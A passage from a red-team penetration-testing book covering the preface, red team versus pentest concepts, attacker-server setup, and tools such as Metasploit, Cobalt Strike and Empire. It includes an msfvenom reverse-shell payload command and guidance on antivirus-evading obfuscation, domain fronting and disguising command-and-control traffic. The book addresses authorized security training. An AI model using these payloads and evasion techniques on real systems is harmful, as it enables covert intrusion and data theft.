3,5,6,7 ITT630.pdf

Full Transcript

 THE
HACKER
PLAYBOOK
3
Practical Guide to
Penetration Testing

Red Team Edition
Peter Kim
 Copyright © 2018 by Secure Planet LLC. All rights reserved. Except as
permitted under United States Copyright Act of 1976, no part of this publication
may be reproduced or distributed in any form or by any means, or stored in a
database or retrieval system, without the prior written permission of the author.
All rights reserved.
ISBN-13: 978-1980901754

Book design and production by Peter Kim, Secure Planet LLC
Cover design by Ann Le
Edited by Kristen Kim

Publisher: Secure Planet LLC
Published: 1st May 2018

Dedication

To my wife Kristen, our new baby boy, our dog Dexter, and our families.
Thank you for all of your support and patience, even when you had no clue what
I was talking about.
Contents
Preface
Notes and Disclaimer
Introduction
Penetration Testing Teams vs Red Teams
Summary
1 Pregame - The Setup
Assumed Breach Exercises
Setting Up Your Campaign
Setting Up Your External Servers
Tools of the Trade
Metasploit Framework
Cobalt Strike
PowerShell Empire
dnscat2
p0wnedShell
Pupy Shell
PoshC2
Merlin
Nishang
Conclusion
2 Before the Snap - Red Team Recon
Monitoring an Environment
Regular Nmap Diffing
Web Screenshots
Cloud Scanning
Network/Service Search Engines
Manually Parsing SSL Certificates
Subdomain Discovery
Github
Cloud
Emails
Additional Open Source Resources
Conclusion
3 The Throw - Web Application Exploitation
Bug Bounty Programs:
Web Attacks Introduction - Cyber Space Kittens
 The Red Team Web Application Attacks
Chat Support Systems Lab
Cyber Space Kittens: Chat Support Systems
Setting Up Your Web Application Hacking Machine
Analyzing a Web Application
Web Discovery
Cross-Site Scripting XSS
Blind XSS
DOM Based XSS
Advanced XSS in NodeJS
XSS to Compromise
NoSQL Injections
Deserialization Attacks
Template Engine Attacks - Template Injections
JavaScript and Remote Code Execution
Server Side Request Forgery (SSRF)
XML eXternal Entities (XXE)
Advanced XXE - Out Of Band (XXE-OOB)
Conclusion
4 The Drive - Compromising the Network
Finding Credentials from Outside the Network
Advanced Lab
Moving Through the Network
Setting Up the Environment - Lab Network
On the Network with No Credentials
Responder
Better Responder (MultiRelay.py)
PowerShell Responder
User Enumeration Without Credentials
Scanning the Network with CrackMapExec (CME)
After Compromising Your Initial Host
Privilege Escalation
Privilege Escalation Lab
Pulling Clear Text Credentials from Memory
Getting Passwords from the Windows Credential Store and Browsers
Getting Local Creds and Information from OSX
Living Off of the Land in a Windows Domain Environment
Service Principal Names
Querying Active Directory
 Bloodhound/Sharphound
Moving Laterally - Migrating Processes
Moving Laterally Off Your Initial Host
Lateral Movement with DCOM
Pass-the-Hash
Gaining Credentials from Service Accounts
Dumping the Domain Controller Hashes
Lateral Movement via RDP over the VPS
Pivoting in Linux
Privilege Escalation
Linux Lateral Movement Lab
Attacking the CSK Secure Network
Conclusion
5 The Screen - Social Engineering
Building Your Social Engineering (SE) Campaigns
Doppelganger Domains
How to Clone Authentication Pages
Credentials with 2FA
Phishing
Microsoft Word/Excel Macro Files
Non-Macro Office Files - DDE
Hidden Encrypted Payloads
Exploiting Internal Jenkins with Social Engineering
Conclusion
6 The Onside Kick - Physical Attacks
Card Reader Cloners
Physical Tools to Bypass Access Points
LAN Turtle (lanturtle.com)
Packet Squirrel
Bash Bunny
Breaking into Cyber Space Kittens
QuickCreds
BunnyTap
WiFi
Conclusion
7 The Quarterback Sneak - Evading AV and Network Detection
Writing Code for Red Team Campaigns
The Basics Building a Keylogger
Setting up your environment
 Compiling from Source
Sample Framework
Obfuscation
THP Custom Droppers
Shellcode vs DLLs
Running the Server
Client
Configuring the Client and Server
Adding New Handlers
Further Exercises
Recompiling Metasploit/Meterpreter to Bypass AV and Network Detection
How to Build Metasploit/Meterpreter on Windows:
Creating a Modified Stage 0 Payload:
SharpShooter
Application Whitelisting Bypass
Code Caves
PowerShell Obfuscation
PowerShell Without PowerShell:
HideMyPS
Conclusion
8 Special Teams - Cracking, Exploits, and Tricks
Automation
Automating Metasploit with RC scripts
Automating Empire
Automating Cobalt Strike
The Future of Automation
Password Cracking
Gotta Crack Em All - Quickly Cracking as Many as You Can
Cracking the CyberSpaceKittens NTLM hashes:
Creative Campaigns
Disabling PS Logging
Windows Download File from Internet Command Line
Getting System from Local Admin
Retrieving NTLM Hashes without Touching LSASS
Building Training Labs and Monitor with Defensive Tools
Conclusion
9 Two-Minute Drill - From Zero to Hero
10 Post Game Analysis - Reporting
Continuing Education
About the Author
Special Thanks
preface
This is the third iteration of The Hacker Playbook (THP) series. Below is an
overview of all the new vulnerabilities and attacks that will be discussed. In
addition to the new content, some attacks and techniques from the prior books
(which are still relevant today) are included to eliminate the need to refer back to
the prior books. So, what's new? Some of the updated topics from the past
couple of years include:
Abusing Active Directory
Abusing Kerberos
Advanced Web Attacks
Better Ways to Move Laterally
Cloud Vulnerabilities
Faster/Smarter Password Cracking
Living Off the Land
Lateral Movement Attacks
Multiple Custom Labs
Newer Web Language Vulnerabilities
Physical Attacks
Privilege Escalation
PowerShell Attacks
Ransomware Attacks
Red Team vs Penetration Testing
Setting Up Your Red Team Infrastructure
Usable Red Team Metrics
Writing Malware and Evading AV
And so much more

Additionally, I have attempted to incorporate all of the comments and
recommendations received from readers of the first and second books. I do want
to reiterate that I am not a professional author. I just love security and love
teaching security and this is one of my passion projects. I hope you enjoy it.

This book will also provide a more in-depth look into how to set up a lab
environment in which to test your attacks, along with the newest tips and tricks
of penetration testing. Lastly, I tried to make this version easier to follow since
many schools have incorporated my book into their curricula. Whenever
possible, I have added lab sections that help provide a way to test a vulnerability
or exploit.

As with the other two books, I try to keep things as realistic, or “real world”, as
possible. I also try to stay away from theoretical attacks and focus on what I
have seen from personal experience and what actually worked. I think there has
been a major shift in the industry from penetration testers to Red Teamers, and I
want to show you rather than tell you why this is so. As I stated before, my
passion is to teach and challenge others. So, my goals for you through this book
are two-fold: first, I want you to get into the mindset of an attacker and
understand “the how” of the attacks; second, I want you to take the tools and
techniques you learn and expand upon them. Reading and repeating the labs is
only one part – the main lesson I teach to my students is to let your work speak
for your talents. Instead of working on your resume (of course, you should have
a resume), I really feel that having a strong public Github repo/technical blog
speaks volumes in security over a good resume. Whether you live in the blue
defensive or red offensive world, getting involved and sharing with our security
community is imperative.

For those who did not read either of my two prior books, you might be
wondering what my experience entails. My background includes more than 12
years of penetration testing/red teaming for major financial institutions, large
utility companies, Fortune 500 entertainment companies, and government
organizations. I have also spent years teaching offensive network security at
colleges, spoken at multiple security conferences, been referenced in many
security publications, taught courses all over the country, ran multiple public
CTF competitions, and started my own security school. One of my big passion
project was building a free and open security community in Southern California
called LETHAL (meetup.com/lethal). Now, with over 800+ members, monthly
meetings, CTF competitions, and more, it has become an amazing environment
for people to share, learn, and grow.

One important note is that I am using both commercial and open source tools.
For every commercial tool discussed, I try to provide an open source
counterpart. I occasionally run into some pentesters who claim they only use
open source tools. As a penetration tester, I find this statement hard to accept. If
you are supposed to emulate a “real world” attack, the “bad guys” do not have
these restrictions; therefore, you need to use any tool (commercial or open
source) that will get the job done.

A question I get often is, who is this book intended for? It is really hard to state
for whom this book is specifically intended as I truly believe anyone in security
can learn. Parts of this book might be too advanced for novice readers, some
parts might be too easy for advanced hackers, and other parts might not even be
in your field of security.

For those who are just getting into security, one of the most common things I
hear from readers is that they tend to gain the most benefit from the books after
reading them for the second or third time (making sure to leave adequate time
between reads). There is a lot of material thrown at you throughout this book
and sometimes it takes time to absorb it all. So, I would say relax, take a good
read, go through the labs/examples, build your lab, push your scripts/code to a
public Github repository, and start up a blog.

Lastly, being a Red Team member is half about technical ability and half about
having confidence. Many of the social engineering exercises require you to
overcome your nervousness and go outside your comfort zone. David Letterman
said it best, "Pretending to not be afraid is as good as actually not being afraid."
Although this should be taken with a grain of salt, sometimes you just have to
have confidence, do it, and don't look back.
Notes and Disclaimer
I can't reiterate this enough: Do not go looking for vulnerable servers and
exploits on systems you don't own without the proper approval. Do not try to do
any of the attacks in this book without the proper approval. Even if it is for
curiosity versus malicious intent, you can still get into a lot of trouble for these
actions. There are plenty of bug bounty programs and vulnerable sites/VMs to
learn off of in order to continue growing. Even for some bug bounty programs,
breaking scope or going too far can get you in trouble:
https://www.forbes.com/sites/thomasbrewster/2015/12/17/facebook-
instagram-security-research-threats/#c3309902fb52
https://nakedsecurity.sophos.com/2012/02/20/jail-facebook-ethical-
hacker/
https://www.cyberscoop.com/dji-bug-bounty-drone-technology-sean-
melia-kevin-finisterre/

If you ever feel like it's wrong, it's probably wrong and you should ask a lawyer
or contact the Electronic Frontier Foundation (EFF)
(https://www.eff.org/pages/legal-assistance). There is a fine line between
research and illegal activities.

Just remember, ONLY test systems on which you have written permission. Just
Google the term “hacker jailed” and you will see plenty of different examples
where young teens have been sentenced to years in prison for what they thought
was a “fun time.” There are many free platforms where legal hacking is allowed
and will help you further your education.

Finally, I am not an expert in Windows, coding, exploit dev, Linux, or really
anything else. If I misspoke about a specific technology, tool, or process, I will
make sure to update the Hacker Playbook Updates webpage
(thehackerplaybook.com/updates) for anything that is reported as incorrect.
Also, much of my book relies on other people's research in the field, and I try to
provide links to their original work whenever possible. Again, if I miss any of
them, I will update the Updates webpage with that information. We have such
an awesome community and I want to make sure everyone gets acknowledged
for their great work!
introduction
In the last engagement (The Hacker Playbook 2), you were tasked with breaking
into the Cyber Kittens weapons facility. They are now back with their brand
new space division called Cyber Space Kittens (CSK). This new division took
all the lessons learned from the prior security assessment to harden their
systems, set up a local security operations center, and even create security
policies. They have hired you to see if all of their security controls have helped
their overall posture.

From the little details we have picked up, it looks like Cyber Space Kittens has
discovered a secret planet located in the Great Andromeda Nebula or
Andromeda Galaxy. This planet, located on one of the two spiral arms, is
referred to as KITT-3n. KITT-3n, whose size is double that of Earth, resides in
the binary system called OI 31337 with a star that is also twice the size of
Earth’s star. This creates a potentially habitable environment with oceans, lakes,
plants, and maybe even life…

With the hope of new life, water, and another viable planet, the space race is
real. CSK has hired us to perform a Red Team assessment to make sure they are
secure, and capable of detecting and stopping a breach. Their management has
seen and heard of all the major breaches in the last year and want to hire only the
best. This is where you come in...

Your mission, if you choose to accept it, is to find all the external and internal
vulnerabilities, use the latest exploits, use chained vulnerabilities, and see if their
defensive teams can detect or stop you.

What types of tactics, threats, and procedures are you going to have to employ?
In this campaign, you are going to need to do a ton of reconnaissance and
discovery, look for weaknesses in their external infrastructure, social engineer
employees, privilege escalate, gain internal network information, move laterally
throughout the network, and ultimately exfiltrate KITT-3n systems and
databases.
Penetration Testing Teams vs Red Team s
Before we can dive into the technical ideals behind Red Teams, I need to clarify
my definitions of Penetration Testing and Red Teams. These words get thrown
around often and can get a little mixed up. For this book, I want to talk about
how I will use these two terms.

Penetration Testing is the more rigorous and methodical testing of a network,
application, hardware, etc. If you haven’t already, I recommend that you read
the Penetration Testing Execution Standard (PTES: http://www.pentest-
standard.org) – it is a great walkthrough of how to perform an assessment. In
short, you go through all the motions of Scoping, Intel Gathering, Vulnerability
Analysis, Exploitation, Post Exploitation, and Reporting. In the traditional
network test, we usually scan for vulnerabilities, find and take advantage of an
exploitable system or application, maybe do a little post exploitation, find
domain admin, and write up a report. These types of tests create a matrix of
vulnerabilities, patching issues, and very actionable results. Even during the
scope creation, penetration tests are very well defined, limited to a one or two-
week assessment period, and are generally announced to the company’s internal
security teams. Companies still need penetration testers to be a part of their
secure software development life cycle (S-SDLC).

Nowadays, even though companies have vulnerability management programs, S-
SDLC programs, penetration testers, incident response teams/programs, and
many of the very expensive security tools, they still get compromised. If we
look at any of the recent breaches
(http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-
breaches-hacks), we see that many of these happened to very large and mature
companies. We have seen in other security reports that some compromises
could have lasted longer than 6 months before they were detected
(https://en.wikipedia.org/wiki/Sony_Pictures_hack). There are also some reports
that state that almost one-third of all businesses were breached in 2017
(https://www.esecurityplanet.com/network-security/almost-a-third-of-all-u.s.-
businesses-were-breached-in-2017.html). The questions I want companies to
ask are if these exact same bad guys or actor sets came after your company with
the exact same tactics, could you detect it, how long would it take, could you
recover from it, and could you figure out exactly what they did?

This is where Red Teams come into play. The Red Team’s mission is to emulate
the tactics, techniques, and procedures (TTPs) by adversaries. The goals are to
give real world and hard facts on how a company will respond, find gaps within
a security program, identify skill gaps within employees, and ultimately increase
their security posture.

For Red Teams, it is not as methodical as penetration tests. Since we are
simulating real world events, every test can differ significantly. Some
campaigns might have a focus on getting personally identifiable information
(PII) or credit cards, while others might focus on getting domain administrative
control. Speaking of domain admin, this where I see a huge difference between
Penetration Tests and Red Team campaigns. For network pentests, we love
getting to Domain Admin (DA) to gain access to the Domain Controller (DC)
and calling it a day. For Red Team campaigns, based on the campaign, we may
ignore the DC completely. One reason for this is that we are seeing many
companies placing a lot of protection around their DCs. They might have
application whitelisting, integrity monitoring, lots of IDS/IPS/HIPS rules, and
even more. Since our mission is not to get caught, we need to stay low key.
Another rule we follow is that we almost never run a vulnerability scan against
the internal network. How many adversaries have you seen start to perform full
vulnerability scans once inside a compromised environment? This is extremely
rare. Why? Vulnerability scans are very loud on the network and will most
likely get caught in today’s world.

Another major difference in the scope is the timeline. With penetration tests, we
are lucky to get two weeks, if not one. Whereas, Red Teams must build
campaigns that last from 2 weeks to 6 months. This is because we need to
simulate real attacks, social engineering, beaconing, and more. Lastly, the
largest difference is the outcome of the two types of teams. Instead of a list of
vulnerabilities, Red Team findings need to be geared more toward gaps in blue
team processes, policies, tools, and skills. In your final report, you may have
some vulnerability findings that were used for the campaign, but most findings
will be gaps in the security program. Remember findings should be mainly for
the security program, not IT.

Penetration Tests Red Teams
Methodical Security Assessments: Flexible Security Assessments:
Pre-engagement Intelligence Gathering
Interactions Initial Foothold
 Intelligence Gathering Persistence/Local
Vulnerability Analysis Privilege Escalation
Exploitation Local/Network
Post Exploitation Enumeration
Reporting Lateral Movement
Data
Identification/Exfiltration
Domain Privilege
Escalation/Dumping
Hashes
Reporting
Scope: Scope:
Restrictive Scope No Rules*
1-2 Week Engagement 1 Week – 6 Month
Generally Announced Engagement
Identify vulnerabilities No announcement
Test Blue teams on
program, policies, tools,
and skills
*Can’t be illegal…

With Red Teams, we need to show value back to the company. It isn’t about the
number of total vulnerability counts or criticality of individual vulnerabilities; it
is about proving how the security program is running. The goal of the Red Team
is to simulate real world events that we can track. Two strong metrics that
evolve from these campaigns are Time To Detect (TTD) and Time To Mitigate
(TTM). These are not new concepts, but still valuable ones for Red Teams.

What does Time To Detect (TTD) mean? It is the time between the initial
occurrence of the incident to when an analyst detects and starts working on the
incident. Let’s say you have a social engineering email and the user executes
malware on their system. Even though their AV, host-based security system, or
monitoring tools might trigger, the time recorded is when the analyst creates that
first ticket.

Time To Mitigate (TTM) is the secondary metric to record. This timeline is
recorded when the firewall block, DNS sinkhole, or network isolation is
implemented. The other valuable information to record is how the Security
Teams work with IT, how management handles a critical incident, and if
employees panic. With all this data, we can build real numbers on how much
your company is at risk, or how likely it is to be compromised.
Summary
The big push I want to make is for managers to get outside the mentality of
relying on metrics from audits. We all have reasons for compliance and they can
definitely help mature our programs, but they don't always provide real world
security for a company. As Red Teamers, our job is to test if the overall security
program is working.

As you read through this book, I want you to put yourself in the Red Team
mindset and focus on:
Vulnerabilities in Security not IT
Simulate Real World events
Live in a world of constant Red Team infections

Challenge the system… Provide real data to prove security gaps.
1 pregame - the setup
As a Red Team, we don’t really care as much about the origins of an attack.
Instead, we want to learn from the TTPs. For example, looking at public
sources, we found a detailed report from FireEye on an attack they analyzed
(https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf).
Reviewing their analysis, we can see that the TTPs of the malware used Twitter
as part of the Command and Control (C2), images with encryption keys, GitHub,
and steganography. This is where we would build a similar campaign to see if
your company could detect this attack.

A detailed breakdown for APT attacks is MITRE’s Adversarial Tactics,
Techniques, and Common Knowledge (ATT&CK) matrix. This is a large
collection of different TTPs commonly used with all sorts of attacks.

Another resource is this running list of APT Groups and Operations document
from @cyb3rops. This Google Document (http://bit.ly/2GZb8eW) breaks down
different suspected APT groups and their toolsets. This is a useful list for us as
Red Teamers to simulate different attacks. Of course, we might not use the same
tools as documented in the reports, but we may build similar tools that will do
the same thing.
Assumed Breach Exercises
Companies need to live in a world today where they start with the assumption
that they have already been breached. These days, too many companies assume
that because of some check box or annual penetration test, they are secure. We
need to get in a state of mind where we are always hunting, assuming evil is
lurking around, and looking for these anomalies.

This is where Red Team campaigns heavily differ from penetration tests. Since
Red Team campaigns focus on detection/mitigation instead of vulnerabilities, we
can do some more unique assessments. One assessment that provides
customers/clients with immense benefit is called an assumed breach exercise. In
an assumed breach exercise, the concept is that there will always be 0-days. So,
can the client identify and mitigate against secondary and tertiary steps?

In these scenarios, Red Teams work with a limited group of people inside the
company to get a single custom malware payload to execute on their server.
This payload should try to connect out in multiple ways, make sure to bypass
common AV, and allow for additional payloads to be executed from memory.
We will have example payloads throughout the book. Once the initial payload is
executed, this is where all the fun begins!
Setting Up Your Campaign
This is one of my favorite parts of running Red Teams. Before you compromise
your first system, you need to scope out your Red Team campaign. In a lot of
penetration tests, you are given a target and you continually try to break into that
single system. If something fails, you go on to the next thing. There is no script
and you are usually pretty focused on that network.

In Red Team campaigns, we start out with a few objectives. These objectives
can include, but are not limited to:
What are the end goal goals? Is it just APT detection? Is it to get a
flag on a server? Is it to get data from a database? Or is it just to get
TTD metrics?
Is there a public campaign we want to copy?
What techniques are you going to use? We talked about using
MITRE ATT&CK Matrix, but what are the exact techniques in each
category?
The team at Red Canary supplied detailed information on
each one of these techniques. I highly recommend you
take time and review them all: http://bit.ly/2H0MTZA
What tools does the client want you to use? Will it be COTS
offensive tools like Metasploit, Cobalt Strike, DNS Cat? Or custom
tools?

The best part is that getting caught is part of the assessment. There are some
campaigns where we get caught 4 or 5 times and have to burn 4 or 5 different
environments. This really shows to your client that their defenses are working
(or not working) based on what results they expected. At the end of the book, I
will provide some reporting examples of how we capture metrics and report that
data.
Setting Up Your External Servers
There are many different services that we use for building our campaigns. In
today's world with the abundance of Virtual Private Servers (VPS), standing up
your attacker machines on the internet won't break your budget. For example, I
commonly use Digital Ocean Droplets
(https://www.digitalocean.com/products/compute) or Amazon Web Services
(AWS) Lightsail servers (https://lightsail.aws.amazon.com) to configure my
VPS servers. The reasons I use these services are because they are generally
very low cost (sometimes free), allow for Ubuntu servers, allow for servers in all
sorts of regions, and most importantly, are very easy to set up. Within minutes,
you can have multiple servers set up and running Metasploit and Empire
services.

I am going to focus on AWS Lightsail servers in this book, due to the ease in
setting up, ability to automate services, and the amount of traffic normally going
to AWS. After you have fully created an image you like, you can rapidly clone
that image to multiple servers, which makes it extremely easy to build ready-
made Command and Control boxes.

Again, you should make sure you abide by the VPS provider's service terms (i.e.
https://aws.amazon.com/service-terms/) so you do not fall into any problems.

https://lightsail.aws.amazon.com/
Create an Instance
I highly recommend getting at least 1 GB of RAM
Storage space usually isn't an issue
Linux/Unix
OS Only -> Ubuntu
Download Cert
chmod 600 cert
ssh -i cert ubuntu@[ip]

Once you are logged into your server, you need to install all the tools as
efficiently and repeatable as possible. This is where I recommend that you
develop your own scripts to set up things such as IPTables rules, SSL certs,
tools, scripts, and more. A quick way to build your servers is to integrate
TrustedSec's The PenTesters Framework (PTF). This collection of scripts
(https://github.com/trustedsec/ptf) does a lot of the hard work for you and creates
a framework for everything else. Let's walk through a quick example of
installing all of our exploitation, intel gathering, post exploitation, PowerShell,
and vulnerability analysis tools.
sudo su -
apt-get update
apt-get install python
git clone https://github.com/trustedsec/ptf optptf
cd optptf &&./ptf
use modules/exploitation/install_update_all
use modules/intelligence-gathering/install_update_all
use modules/post-exploitation/install_update_all
use modules/powershell/install_update_all
use modules/vulnerability-analysis/install_update_all
cd /pentest

The following image shows all the different modules available, some of which
we installed.

Image of all available modules

If we take a look at our attacker VPS, we can see all of the tools installed on our
box. If we wanted to start up Metasploit, we can just type: msfconsole.
 All tools installed under /pentest

One thing I still recommend is setting up strong IPTables rules. Since this will
be your attacker server, you will want to limit where SSH authentications can
initiate from, where Empire/Meterpreter/Cobalt Strike payloads can come from,
and any phishing pages you stand up.

If you remember back in late 2016, someone had found an unauthenticated
Remote Code Execution (RCE) on Cobalt Strike Team Server
(https://blog.cobaltstrike.com/2016/09/28/cobaltstrike-rce-active-exploitation-
reported/). You definitely don't want your attacker servers compromised with
your customer's data.

I have also seen some Red Teams run Kali Linux (or at least Metasploit) in
Docker inside AWS (http://bit.ly/2qz2vN9). From my point of view, there is no
wrong way to create your systems. What you do want is to create an efficient
and repeatable process to deploy multiple machines. The best part of using
Lightsail is that once you have your machine configured to your preferences,
you can take a snapshot of a machine and stand up multiple, brand new instances
of that image.

If you want to get your environment to the next level, check out the team at
Coalfire-Research. They built custom modules to do all the hard work and
automation for you. Red Baron is a set of modules and custom/third-party
providers for Terraform, which tries to automate the creation of resilient,
disposable, secure, and agile infrastructure for Red Teams
[https://github.com/Coalfire-Research/Red-Baron]. Whether you want to build a
phishing server, Cobalt Strike infrastructure, or create a DNS C2 server, you can
do it all with Terraform.

Take a look at https://github.com/Coalfire-Research/Red-Baron and check out
all the different modules to quickly build your own infrastructure.
Tools of the Trade
There are a myriad of tools a Red Team might use, but let’s talk about some of
the core resources. Remember that as a Red Teamer, the purpose is not to
compromise an environment (which is the most fun), but to replicate real world
attacks to see if a customer is protected and can detect attacks in a very short
timeframe. In the previous chapters, we identified how to replicate an attacker's
profile and toolset, so let’s review over some of the most common Red Team
tools.
Metasploit Framework
This book won't dive too deeply into Metasploit as it did in the prior books.
Metasploit Framework is still a gold standard tool even though it was originally
developed in 2003. This is due to both the original creator, H.D. Moore, and the
very active community that supports it. This community-driven framework
(https://github.com/rapid7/metasploit-framework/commits/master), which seems
to be updated daily, has all of the latest public exploits, post exploitation
modules, auxiliary modules, and more.

For Red Team engagements, we might use Metasploit to compromise internal
systems with the MS17-010 Eternal Blue Exploit (http://bit.ly/2H2PTsI) to get
our first shell or we might use Metasploit to generate a Meterpreter payload for
our social engineering attack.

In the later chapters, we are going to show you how to recompile your
Metasploit payloads and traffic to bypass AV and network sensors.
Obfuscating Meterpreter Payloads
If we are performing some social engineering attack, we might want to use a
Word or Excel document as our delivery mechanism. However, a potential
problem is that we might not be able to include a Meterpreter payload binary or
have it download one from the web, as AV might trigger on it. Also, a simple
solution is obfuscation using PowerShell:
msfvenom --payload windows/x64/meterpreter_reverse_http --format
psh --out meterpreter-64.ps1 LHOST=127.0.0.1

We can even take this to the next level and use tools like Unicorn
(https://github.com/trustedsec/unicorn) to generate more obfuscated PowerShell
Meterpreter payloads, which we will be covered in more detail as we go through
the book.

Additionally, using signed SSL/TLS certificates by a trusted authority could help
us get around certain network IDS tools: https://github.com/rapid7/metasploit-
framework/wiki/Meterpreter-Paranoid-Mode.

Finally, later in the book, we will go over how to recompile
Metasploit/Meterpreter from scratch to evade both host and network based
detection tools.

Cobalt Strike
Cobalt Strike is by far one of my favorite Red Team simulation tools. What is
Cobalt Strike? It is a tool for post exploitation, lateral movement, staying hidden
in the network, and exfiltration. Cobalt Strike doesn't really have exploits and
isn't used for compromising a system via the newest 0-day vulnerability. Where
you really see its extensive features and powers is when you already have code
execution on a server or when it is used as part of a phishing campaign payload.
Once you can execute a Cobalt Strike payload, it creates a Beacon connection
back to the Command and Control server.

New Cobalt Strike licenses cost $3,500 per user for a one-year license, so it is
not a cheap tool to use. There is a free limited trial version available.
Cobalt Strike Infrastructure
As mentioned earlier, in terms of infrastructure, we want to set up an
environment that is reusable and highly flexible. Cobalt Strike supports
redirectors so that if your C2 domain is burned, you don't have to spin up a
whole new environment, only a new domain. You can find more on using socat
to configure these redirectors here: http://bit.ly/2qxCbCZ and
http://bit.ly/2IUc4Oe.
To take your redirectors up a notch, we utilize Domain Fronting. Domain
Fronting is a collection of techniques to make use of other people’s domains and
infrastructures as redirectors for your controller (http://bit.ly/2GYw55A). This
can be accomplished by utilizing popular Content Delivery Networks (CDNs)
such as Amazon’s CloudFront or other Google Hosts to mask traffic origins.
This has been utilized in the past by different adversaries
(http://bit.ly/2HoCRFi).

Using these high reputation domains, any traffic, regardless of HTTP or HTTPS,
will look like it is communicating to these domains instead of our malicious
Command and Control servers. How does this all work? Using a very high-
level example, all your traffic will be sent to one of the primary Fully Qualified
Domain Names (FQDNs) for CloudFront, like a0.awsstatic.com, which is
CloudFront's primary domain. Modifying the host header in the request will
redirect all the traffic to our CloudFront distribution, which will ultimately
forward the traffic to our Cobalt Strike C2 server (http://bit.ly/2GYw55A).
By changing the HTTP Host header, the CDN will happily route us to the correct
server. Red Teams have been using this technique for hiding C2 traffic by using
high reputation redirectors.

Two other great resources on different products that support Domain Fronting:
CyberArk also wrote an excellent blog on how to use Google App
products to look like your traffic is flowing through
www.google.com, mail.google.com, or docs.google.com here:
http://bit.ly/2Hn7RW4.
Vincent Yiu wrote an article on how to use Alibaba CDN to support
his domain fronting attacks: http://bit.ly/2HjM3eH.
Cobalt Strike isn't the only tool that can support Domain Fronting,
this can also be accomplished with Meterpreter
https://bitrot.sh/post/30-11-2017-domain-fronting-with-meterpreter/.

Note: At the time of publishing this book, AWS (and even Google) have starting
implementing protections against domain fronting (https://amzn.to/2I6lSry).
This doesn't stop this type of attack, but would require different third party
resources to abuse.

Although not part of the infrastructure, it is important to understand how your
beacons work within an internal environment. In terms of operational security,
we don’t want to build a campaign that can be taken out easily. As a Red
Teamer, we have to assume that some of our agents will be discovered by the
Blue Team. If we have all of our hosts talking to one or two C2 endpoints, it
would be pretty easy to take out our entire infrastructure. Luckily for us, Cobalt
Strike supports SMB Beacons between hosts for C2 communication. This
allows you to have one compromised machine communicate to the internet, and
all other machines on the network to communicate through the initial
compromised host over SMB (https://www.cobaltstrike.com/help-smb-beacon).
This way, if one of the secondary systems is detected and forensics analysis is
performed, they might not be able to identify the C2 domain associated with the
attack.

A neat feature of Cobalt Strike that immensely helps Red Teams is its ability to
manipulate how your Beacons communicate. Using Malleable C2 Profiles, you
can have all your traffic from your compromised systems look like normal
traffic. We are getting into more and more environments where layer 7
application filtering is happening. In layer 7, they are looking for anomalous
traffic that many times this is over web communication. What if we can make
our C2 communication look like normal web traffic? This is where Malleable
C2 Profiles come into play. Take a look at this example:
https://github.com/rsmudge/Malleable-C2-
Profiles/blob/master/normal/amazon.profile. Some immediate notes:

We see that these are going to be HTTP requests with URI paths:
set uri "sref=nb_sb_noss_1/167-3294888-0262949/field-
keywords=books";
The host header is set to Amazon:
header "Host" "www.amazon.com";
And even some custom Server headers are sent back from the C2
server
header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
header "x-amz-id-2"
"a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZG

Now that these have been used in many different campaigns, numerous security
devices have created signatures on all of the common Malleable Profiles
(https://github.com/rsmudge/Malleable-C2-Profiles). What we have done to get
around this is to make sure all the static strings are modified, make sure all
UserAgent information is changed, configure SSL with real certificates (don't
use default Cobalt Strike SSL certificates), use jitter, and change beacon times
for the agents. One last note is to make sure the communication happens over
POST (http-post) commands as failing to do so may cause a lot of headache in
using custom profiles. If your profile communicates over http-get, it will still
work, but uploading large files will take forever. Remember that GET is
generally limited to around 2048 characters.

The team at SpectorOps also created Randomized Malleable C2 Profiles using:
https://github.com/bluscreenofjeff/Malleable-C2-Randomizer.
Cobalt Strike Aggressor Scripts
Cobalt Strike has numerous people contributing to the Cobalt Strike project.
Aggressor Script is a scripting language for Red Team operations and adversary
simulations inspired by scriptable IRC clients and bots. Its purpose is two-fold:
(1) You may create long running bots that simulate virtual Red Team members,
hacking side-by-side with you, (2) you may also use it to extend and modify the
Cobalt Strike client to your needs [https://www.cobaltstrike.com/aggressor-
script/index.html]. For example, HarleyQu1nn has put together a great list of
different aggressor scripts to use with your post exploitation:
http://bit.ly/2qxIwPE.

PowerShell Empire
Empire is a post-exploitation framework that includes a pure-PowerShell2.0
Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of
the previous PowerShell Empire and Python EmPyre projects. The framework
offers cryptologically-secure communications and a flexible architecture. On the
PowerShell side, Empire implements the ability to run PowerShell agents
without needing powershell.exe, rapidly deployable post-exploitation modules
ranging from key loggers to Mimikatz, and adaptable communications to evade
network detection, all wrapped up in a usability-focused framework
[https://github.com/EmpireProject/Empire].

For Red Teamers, PowerShell is one of our best friends. After the initial
payload, all subsequent attacks are stored in memory. The best part of Empire is
that it is actively maintained and updated so that all the latest post-exploitation
modules are available for attacks. They also have C2 connectivity for Linux and
OS X. So you can still create an Office Macro in Mac and, when executed, have
a brand new agent in Empire.
We will cover Empire in more detail throughout the book so you can see how
effective it is. In terms of setting up Empire, it is very important to ensure you
have configured it securely:
Set the CertPath to a real trusted SSL certificate.
Change the DefaultProfile endpoints. Many layer 7 firewalls look
for the exact static endpoints.
Change the User Agent used to communicate.

Just like Metasploit's rc files used for automation in the prior books, Empire now
supports autorun scripts for efficiency and effectiveness.

Running Empire:
Starting up Empire
cd optEmpire &&./setup/reset.sh
Exit
exit
Setup Up Cert (best practice is to use real trusted certs)./setup/cert.sh
Start Empire./empire
Start a Listener
listeners
Pick your listener (we'll use http for our labs)
uselistener [tab twice to see all listener types]
uselistener http
View all configurations for the listener
info
Set the following (i.e. set KillDate 12/12/2020):
KillDate - The end of your campaign so your agents
autocleanup
DefaultProfile - Make sure to change all the endpoints (i.e.
adminget.php,/news.php). You can make them up
however you want, such as seriouslynotmalware.php
DefaultProfile - Make sure to also change your User
Agent. I like to look at the top User Agents used and pick
one of those.
Host - Change to HTTPS and over port 443
CertPath - Add your path to your SSL Certificates
UserAgent - Change this to your common User Agent
 Port - Set to 443
ServerVersion - Change this to another common Server
Header
When you are all done, start your listener
execute

Configuring the Payload
The payload is the actual malware that will run on the victim's system. These
payloads can run in Windows, Linux, and OSX, but Empire is most well-known
for its PowerShell Windows Payloads:
Go to the Main menu
main
